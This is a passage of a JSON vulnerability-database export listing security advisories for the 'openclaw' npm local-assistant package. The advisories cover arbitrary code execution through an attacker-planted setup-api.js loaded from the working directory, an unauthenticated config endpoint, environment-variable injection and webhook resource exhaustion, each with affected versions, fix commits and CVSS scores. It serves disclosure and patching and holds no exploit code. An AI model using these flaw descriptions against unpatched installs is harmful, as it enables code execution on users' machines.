channel instead of an untrusted event.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.4.2`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @tdjackey for reporting.", "references": [ { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.5", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-jf56-mccx-5f3f", "reference_id": "", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "8.5", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-jf56-mccx-5f3f" }, { "reference_url": "https://github.com/advisories/GHSA-jf56-mccx-5f3f", "reference_id": "GHSA-jf56-mccx-5f3f", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-jf56-mccx-5f3f" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109872?format=api", "purl": "pkg:npm/openclaw@2026.4.8", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2g7x-vu14-nkde" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dqb2-dej7-augt" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-h9a4-1twb-d7d1" }, { "vulnerability": "VCID-hy24-6xpe-pkb7" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w2yd-uw91-9yck" }, { "vulnerability": "VCID-wyat-1259-2kg9" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8" } ], "aliases": [ "GHSA-jf56-mccx-5f3f" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-dmse-bb22-rkcj" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/94834?format=api", "vulnerability_id": "VCID-dv5s-pvw1-a7fu", "summary": "OpenClaw vulnerable to arbitrary code execution via attacker-controlled setup-api.js loaded from cwd during env-key resolution\n## Summary\n\nOpenClaw's bundled plugin setup resolver could fall back to `process.cwd()` while resolving provider setup metadata. If a user ran an OpenClaw command from an attacker-controlled repository containing `extensions/<plugin>/setup-api.js`, OpenClaw could load and execute that JavaScript during ordinary provider/model status resolution.\n\n## Impact\n\nThis is arbitrary JavaScript execution in the OpenClaw process under the current user account. A malicious repository could run code when the user executed commands such as provider/model inspection from that directory. The issue does not require gateway network exposure, but it does require user interaction: the user must run OpenClaw from a directory containing the attacker-controlled setup file.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` on npm\n- Affected: versions before `2026.4.23`\n- Fixed: `2026.4.23`\n- Latest stable verified fixed: `openclaw@2026.4.23`, tag `v2026.4.23`\n\n## Fix\n\nOpenClaw now resolves bundled setup fallbacks only from the canonical package/repository root and no longer includes `process.cwd()` as a trusted setup-api search root. A regression test verifies that a workspace-local `extensions/<plugin>/setup-api.js` is not loaded through provider setup resolution.\n\n## Fix Commit(s)\n\n- `993781e6e6eaf50f033cfc3e3bf4f47059740707` (`fix(plugins): ignore cwd setup-api fallback`)\n\n## Severity\n\nSeverity remains `high` because successful exploitation allows arbitrary code execution under the user running OpenClaw. The CVSS vector is local/user-interaction scoped rather than network-only because the victim must run OpenClaw from an attacker-controlled directory.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-45004", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00014", "scoring_system": "epss", "scoring_elements": "0.0286", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00014", "scoring_system": "epss", "scoring_elements": "0.02815", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00014", "scoring_system": "epss", "scoring_elements": "0.02869", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-45004" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/993781e6e6eaf50f033cfc3e3bf4f47059740707", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "8.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-11T18:30:14Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/993781e6e6eaf50f033cfc3e3bf4f47059740707" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-r39h-4c2p-3jxp", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "8.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-11T18:30:14Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-r39h-4c2p-3jxp" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45004", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45004" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-arbitrary-code-execution-via-setup-api-js-in-current-working-directory", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "8.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-11T18:30:14Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-arbitrary-code-execution-via-setup-api-js-in-current-working-directory" }, { "reference_url": "https://github.com/advisories/GHSA-r39h-4c2p-3jxp", "reference_id": "GHSA-r39h-4c2p-3jxp", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-r39h-4c2p-3jxp" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/114733?format=api", "purl": "pkg:npm/openclaw@2026.4.23", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.23" } ], "aliases": [ "CVE-2026-45004", "GHSA-r39h-4c2p-3jxp" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-dv5s-pvw1-a7fu" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/93521?format=api", "vulnerability_id": "VCID-e25p-j5ed-yqfz", "summary": "OpenClaw's Gateway Control UI bootstrap config required Gateway auth\n## Summary\nGateway Control UI bootstrap config required Gateway auth.\n\n## Affected Packages / Versions\n- Package: openclaw (npm)\n- Affected versions: <= 2026.4.21\n- Fixed version: 2026.4.22\n\n## Impact\nWhen Gateway authentication was enabled, the Control UI bootstrap config endpoint could still be read without a valid Gateway token. That response could expose sensitive bootstrap/config fields intended only for authenticated Control UI sessions.\n\n## Fix\nThe bootstrap config route now goes through the same Gateway read-auth path as other authenticated Control UI reads. Regression tests cover unauthenticated rejection, valid-token access, and basePath handling.\n\n## Fix Commit(s)\n- 2321d67263bc710e357644d59f746b08d891051b\n\n## Verification\n- The fix commit is contained in the public v2026.4.22 tag.\n- openclaw@2026.4.22 is published on npm and the compiled package contains the fix.\n- Focused regression coverage for this path passed before publication.\n\nOpenClaw thanks @zsxsoft for reporting.", "references": [ { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/2321d67263bc710e357644d59f746b08d891051b", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/2321d67263bc710e357644d59f746b08d891051b" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-93rg-2xm5-2p9v", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-93rg-2xm5-2p9v" }, { "reference_url": "https://github.com/advisories/GHSA-93rg-2xm5-2p9v", "reference_id": "GHSA-93rg-2xm5-2p9v", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-93rg-2xm5-2p9v" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/114466?format=api", "purl": "pkg:npm/openclaw@2026.4.22", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.22" } ], "aliases": [ "GHSA-93rg-2xm5-2p9v" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-e25p-j5ed-yqfz" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90221?format=api", "vulnerability_id": "VCID-e4ac-qm17-qbf5", "summary": "## Impact\n\nOpenClaw Host-Exec Environment Variable Injection.\n\nHost exec could inherit environment variables that influence interpreters, shells, or build tools.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.3.28`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @wsparks-vc for reporting.", "references": [ { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/advisories/GHSA-w9j9-w4cp-6wgr", "reference_id": "GHSA-w9j9-w4cp-6wgr", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-w9j9-w4cp-6wgr" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-w9j9-w4cp-6wgr", "reference_id": "GHSA-w9j9-w4cp-6wgr", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "5.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-w9j9-w4cp-6wgr" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109872?format=api", "purl": "pkg:npm/openclaw@2026.4.8", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2g7x-vu14-nkde" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dqb2-dej7-augt" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-h9a4-1twb-d7d1" }, { "vulnerability": "VCID-hy24-6xpe-pkb7" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w2yd-uw91-9yck" }, { "vulnerability": "VCID-wyat-1259-2kg9" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8" } ], "aliases": [ "GHSA-w9j9-w4cp-6wgr" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-e4ac-qm17-qbf5" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90046?format=api", "vulnerability_id": "VCID-eaaf-8rfa-f3hz", "summary": "Duplicate Advisory: OpenClaw is vulnerable to unauthenticated resource exhaustion through its voice call webhook handling\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-rm59-992w-x2mv. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.22 contains an unauthenticated resource exhaustion vulnerability in voice call webhook handling that buffers request bodies before provider signature checks. Attackers can send large or malicious webhook requests to exhaust server resources without authentication by bypassing signature validation.", "references": [ { "reference_url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/651dc7450b68a5396a009db78ef9382633707ead", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/651dc7450b68a5396a009db78ef9382633707ead" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-rm59-992w-x2mv", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-rm59-992w-x2mv" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35626", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35626" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-unauthenticated-resource-exhaustion-via-voice-call-webhook", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://www.vulncheck.com/advisories/openclaw-unauthenticated-resource-exhaustion-via-voice-call-webhook" }, { "reference_url": "https://github.com/advisories/GHSA-36cp-mh65-x882", "reference_id": "GHSA-36cp-mh65-x882", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-36cp-mh65-x882" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109983?format=api", "purl": "pkg:npm/openclaw@2026.3.22", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p3b-pfnn-x7ad" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-1smq-mbty-jkaj" }, { "vulnerability": "VCID-24m7-jx1g-hqde" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-26sv-grsd-abcw" }, { "vulnerability": "VCID-294z-6z8j-97bx" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2hca-3v8f-f3e8" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2v8n-mnws-jfc9" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-32zs-2zs9-uufs" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-37ep-9smd-zuh9" }, { "vulnerability": "VCID-384t-z1h8-pfft" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3bdd-a9nw-13bn" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4jwj-6s5z-wbeq" }, { "vulnerability": "VCID-4nwq-14y4-xkhp" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4uqc-3h1c-4yhs" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5atj-2a7b-57g5" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-6849-th74-yqd5" }, { "vulnerability": "VCID-6bxd-kbse-sudx" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": 